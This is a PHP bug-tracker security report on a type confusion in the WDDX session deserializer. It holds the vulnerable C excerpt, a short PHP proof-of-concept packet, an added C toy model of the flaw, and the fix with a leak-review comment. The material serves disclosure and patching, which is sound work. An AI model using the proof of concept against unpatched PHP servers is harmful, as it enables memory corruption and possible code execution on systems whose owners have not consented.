Sec Bug #70741 Session WDDX Packet Deserialization Type Confusion Vulnerability
Submitted: 2015-10-19 14:36 UTC Modified: 2016-01-06 03:19 UTC
From: taoguangchen at icloud dot com Assigned: stas
Status: Closed Package: WDDX related
PHP Version: Irrelevant OS: *
Private report: No CVE-ID:
 [2015-10-19 14:36 UTC] taoguangchen at icloud dot com
Description:
------------
Session WDDX Packet Deserialization Type Confusion Vulnerability

```
PS_SERIALIZER_DECODE_FUNC(wddx)
{
	...
	
	MAKE_STD_ZVAL(retval);

	/* php_wddx_deserialize_ex() returns SUCCESS for any packet it can parse,
	   including one whose top-level <data> element is a <string>; the type of
	   retval is never checked before it is used. */
	if ((ret = php_wddx_deserialize_ex((char *)val, vallen, retval)) == SUCCESS) {

		/* Z_ARRVAL_P() reads the zval payload union as a HashTable pointer
		   regardless of Z_TYPE_P(retval), so a string zval's buffer is walked
		   as if it were a hash table. */
		for (zend_hash_internal_pointer_reset(Z_ARRVAL_P(retval));
			 zend_hash_get_current_data(Z_ARRVAL_P(retval), (void **) &ent) == SUCCESS;
			 zend_hash_move_forward(Z_ARRVAL_P(retval))) {
			 hash_type = zend_hash_get_current_key_ex(Z_ARRVAL_P(retval), &key, &key_length, &idx, 0, NULL);
```

An attacker can deserialize a string-type ZVAL via php_wddx_deserialize_ex(). This means the attacker is able to create a fake HashTable via the Z_ARRVAL_P macro with the string-type ZVAL. This should result in arbitrary remote code execution.

PoC:
```
<?php

// Select the WDDX session serializer, whose decode function is the affected code path.
ini_set('session.serialize_handler', 'wddx');
session_start();

// 66 bytes of 'A' are sent as a <string>; the decoder reads this buffer as a HashTable.
$hashtable = str_repeat('A', 66);
$wddx = "<?xml version='1.0'?>
<wddxPacket version='1.0'>
<header/>
	<data>
		<string>$hashtable</string>
	</data>
</wddxPacket>";
// session_decode() hands the packet to PS_SERIALIZER_DECODE_FUNC(wddx).
session_decode($wddx);

?>
```
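The type confusion the report describes, as an added illustration that is neither the reporter's code nor PHP's own: a toy model of the PHP 5 zval union (a simplified layout, assumed here, that keeps only the property that the string pointer and the HashTable pointer share the same bytes), a stand-in deserializer whose packet format is a single tag byte plus payload (constructed for the demo, not WDDX), and the decode routine in its pre-fix form beside the form with the reporter's type check. The sample packets are constructed; the unchecked path only reads the header fields so that it can run without crashing.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Toy model of the PHP 5 engine types involved in this bug. The layout is a
 * simplified assumption, not the real zend structs, but it keeps the one
 * property that matters: the zval payload is a union, so the string pointer
 * and the HashTable pointer occupy the same bytes. */
enum { IS_ARRAY = 4, IS_STRING = 6 };   /* the real PHP 5 type tag values */
enum { SUCCESS = 0, FAILURE = -1 };

typedef struct {
    uint32_t nTableSize;        /* first fields of the real HashTable header */
    uint32_t nNumOfElements;
    void    *pListHead;         /* the real iteration loop would follow this */
} toy_hashtable;

typedef struct {
    union {
        struct { char *val; int len; } str;
        toy_hashtable *ht;
    } value;
    unsigned char type;
} toy_zval;

/* Same shape as the engine macros: Z_ARRVAL_P performs no type check. */
#define Z_TYPE_P(z)   ((z)->type)
#define Z_ARRVAL_P(z) ((z)->value.ht)

/* Stand-in for php_wddx_deserialize_ex(). Packet format constructed for this
 * demo (one tag byte, then payload), not WDDX: 'S' yields a string zval
 * holding the payload, anything else yields an array zval whose element count
 * is the payload length. The caller only sees SUCCESS or FAILURE. */
static int toy_wddx_deserialize(const char *packet, size_t len, toy_zval **out) {
    toy_zval *zv;
    if (len == 0 || !(zv = calloc(1, sizeof *zv))) return FAILURE;
    if (packet[0] == 'S') {
        zv->type = IS_STRING;
        zv->value.str.len = (int)(len - 1);
        zv->value.str.val = malloc(len);           /* payload plus NUL */
        memcpy(zv->value.str.val, packet + 1, len - 1);
        zv->value.str.val[len - 1] = '\0';
    } else {
        toy_hashtable *ht = calloc(1, sizeof *ht);
        ht->nTableSize = 8;
        ht->nNumOfElements = (uint32_t)(len - 1);
        zv->type = IS_ARRAY;
        zv->value.ht = ht;
    }
    *out = zv;
    return SUCCESS;
}

static void toy_zval_free(toy_zval *zv) {
    if (zv->type == IS_STRING) free(zv->value.str.val);
    else free(zv->value.ht);
    free(zv);
}

/* Pre-fix behaviour: SUCCESS is taken to mean "it is an array", so a string
 * zval's bytes are read as a HashTable header. Only the header is read here so
 * the demo does not crash; the real loop would go on to dereference pListHead. */
static long decode_unchecked(const char *packet, size_t len) {
    toy_zval *zv;
    if (toy_wddx_deserialize(packet, len, &zv) != SUCCESS) return FAILURE;
    long n = (long)Z_ARRVAL_P(zv)->nNumOfElements;   /* 'AAAA' for the PoC */
    toy_zval_free(zv);
    return n;
}

/* Post-fix behaviour: the reporter's check rejects anything but an array
 * before Z_ARRVAL_P is ever evaluated. */
static long decode_checked(const char *packet, size_t len) {
    toy_zval *zv;
    if (toy_wddx_deserialize(packet, len, &zv) != SUCCESS) return FAILURE;
    if (Z_TYPE_P(zv) != IS_ARRAY) {
        toy_zval_free(zv);
        return FAILURE;
    }
    long n = (long)Z_ARRVAL_P(zv)->nNumOfElements;
    toy_zval_free(zv);
    return n;
}

/* Constructed counterpart of the report's PoC: a <string> of 66 'A's. */
static const char poc_packet[] =
    "S" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAA";
#define POC_PACKET_LEN (sizeof poc_packet - 1)

/* Constructed legitimate packet: an array with three elements. */
static const char array_packet[] = "A123";
#define ARRAY_PACKET_LEN (sizeof array_packet - 1)

int main(void) {
    printf("unchecked, string packet: nNumOfElements = 0x%lx\n",
           decode_unchecked(poc_packet, POC_PACKET_LEN));
    printf("checked,   string packet: %ld (FAILURE)\n",
           decode_checked(poc_packet, POC_PACKET_LEN));
    printf("checked,   array packet:  %ld elements\n",
           decode_checked(array_packet, ARRAY_PACKET_LEN));
    return 0;
}
```

With the PoC packet the unchecked path reports an element count of 0x41414141, i.e. the attacker's string bytes are already being consumed as HashTable metadata before any pointer in it is followed; the checked path refuses the packet and still returns the correct count for a genuine array.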


 [2015-10-19 14:48 UTC] taoguangchen at icloud dot com
fix:
```
	if ((ret = php_wddx_deserialize_ex((char *)val, vallen, retval)) == SUCCESS) {
		
+		if (Z_TYPE_P(retval) != IS_ARRAY) {
+			return FAILURE;
+		}
		for (zend_hash_internal_pointer_reset(Z_ARRVAL_P(retval));
```
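Review bot: the early `return FAILURE` added before the loop leaks `retval`, which the preceding context allocated with `MAKE_STD_ZVAL(retval)` and which now owns the deserialized non-array value (for the PoC, the attacker's string buffer); add `zval_ptr_dtor(&retval);` before the `return FAILURE;` so the rejected zval is released the same way the existing failure and success paths further down release it.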
 [2015-12-28 20:45 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2015-12-28 20:45 UTC] stas@php.net
In security repo as 1785d2b805f64eaaacf98c14c9e13107bf085ab1
 [2016-01-06 03:19 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-01-06 03:19 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2016-01-06 03:38 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=1785d2b805f64eaaacf98c14c9e13107bf085ab1
Log: Fixed bug #70741: Session WDDX Packet Deserialization Type Confusion Vulnerability
 [2016-02-02 10:53 UTC] korvin1986 at gmail dot com
Hello,
Is there any CVE-ID for this vulnerability?
Or do I have to request it at http://www.cve.mitre.org ?
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Tue Aug 29 15:01:52 2017 UTC